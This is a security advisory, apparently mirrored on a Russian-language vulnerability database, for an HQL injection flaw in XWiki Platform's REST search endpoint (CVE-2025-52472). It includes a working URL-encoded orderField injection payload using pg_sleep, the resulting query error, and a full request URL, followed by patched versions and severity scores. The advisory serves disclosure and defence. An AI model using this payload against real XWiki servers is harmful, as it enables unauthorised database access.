GHSA-gprp-h92g-gc2h

Опубликовано: 06 окт. 2025

Источник: github

Github: Прошло ревью

CVSS4: 9.3

Описание

XWiki Platform is vulnerable to HQL injection via wiki and space search REST API

Impact

The REST search URL is vulnerable to HQL injection via the orderField parameter. The specified value is added twice in the query, though, once in the field list for the select and once in the order clause, so it's not that easy to exploit. The part of the query between the two fields can be enclosed in single quotes to effectively remove them, but the query still needs to remain valid with the query two times in it.

For example, with the following orderField parameter:

doc.fullName%20from%20XWikiDocument%20as%20doc%20where%20%24%24%3D'%24%24%3Dconcat(chr(61)%2Cchr(39))%20and%20version()%7C%7Cpg_sleep(1)%3Dversion()%7C%7Cpg_sleep(1)%20and%20(1%3D1%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F)%20--%20comment'%20or%20a%3D'%20order%20by%20doc.fullName

See the following error:

QuerySyntaxException: unexpected token: $$ near line 1, column 518 [select distinct doc.fullName, doc.space, doc.name, doc.language, doc.doc.fullName from com.xpn.xwiki.doc.XWikiDocument as doc where (doc.hidden <> true or doc.hidden is null) and ($$='$$=concat(chr(61),chr(39)) and version()||pg_sleep(1)=version()||pg_sleep(1) and (1=1 or ?=? or ?=? or ?=? or ?=? or ?=?) -- comment' or a=') order by doc.fullName from com.xpn.xwiki.doc.XWikiDocument as doc where ( (upper(doc.title) like :keywords) ) order by doc.doc.fullName from com.xpn.xwiki.doc.XWikiDocument as doc where $$='$$=concat(chr(61),chr(39)) and version()||pg_sleep(1)=version()||pg_sleep(1) and (1=1 or ?=? or ?=? or ?=? or ?=? or ?=?) -- comment' or a=' order by doc.fullName asc]

For reference, the full URL for the above error is:

http://localhost:8080/xwiki/rest/wikis/xwiki/search?q=test&scope=title&orderField=doc.fullName%20from%20XWikiDocument%20as%20doc%20where%20%24%24%3D%27%24%24%3Dconcat(chr(61)%2Cchr(39))%20and%20version()%7C%7Cpg_sleep(1)%3Dversion()%7C%7Cpg_sleep(1)%20and%20(1%3D1%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F)%20--%20comment%27%20or%20a%3D%27%20order%20by%20doc.fullName

Patches

This has been patched in 17.5.0, 17.4.2, 16.10.9.

Workarounds

There is no known workaround, other than upgrading XWiki.

Resources

For more information

If you have any questions or comments about this advisory:

Open an issue in Jira XWiki.org
Email us at Security Mailing List

Ссылки

Пакеты

Наименование

org.xwiki.platform:xwiki-platform-rest-server

maven

Затронутые версииВерсия исправления

>= 17.0.0-rc-1, < 17.4.2

17.4.2

Наименование

org.xwiki.platform:xwiki-platform-rest-server

maven

Затронутые версииВерсия исправления

>= 4.3-milestone-1, < 16.10.9

16.10.9

EPSS

Процентиль: 64%

0.00477

Низкий

9.3 Critical

CVSS4

CVE ID

CVE-2025-52472

Дефекты

CWE-89

Связанные уязвимости

CVE-2025-52472

nvd

4 месяца назад

XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Starting in version 4.3-milestone-1 and prior to versions 16.10.9, 17.4.2, and 17.5.0, the REST search URL is vulnerable to HQL injection via the `orderField` parameter. The specified value is added twice in the query, though, once in the field list for the select and once in the order clause, so it's not that easy to exploit. The part of the query between the two fields can be enclosed in single quotes to effectively remove them, but the query still needs to remain valid with the query two times in it. This has been patched in versions 17.5.0, 17.4.2, and 16.10.9. No known workarounds are available.

BDU:2025-12562

CVSS3: 9.8

fstec

9 месяцев назад

Уязвимость реализации интерфейса REST API платформы создания совместных веб-приложений XWiki Platform XWiki, позволяющая нарушителю выполнить произвольный код

EPSS

Процентиль: 64%

0.00477

Низкий

9.3 Critical

CVSS4

CVE ID

CVE-2025-52472

Дефекты

CWE-89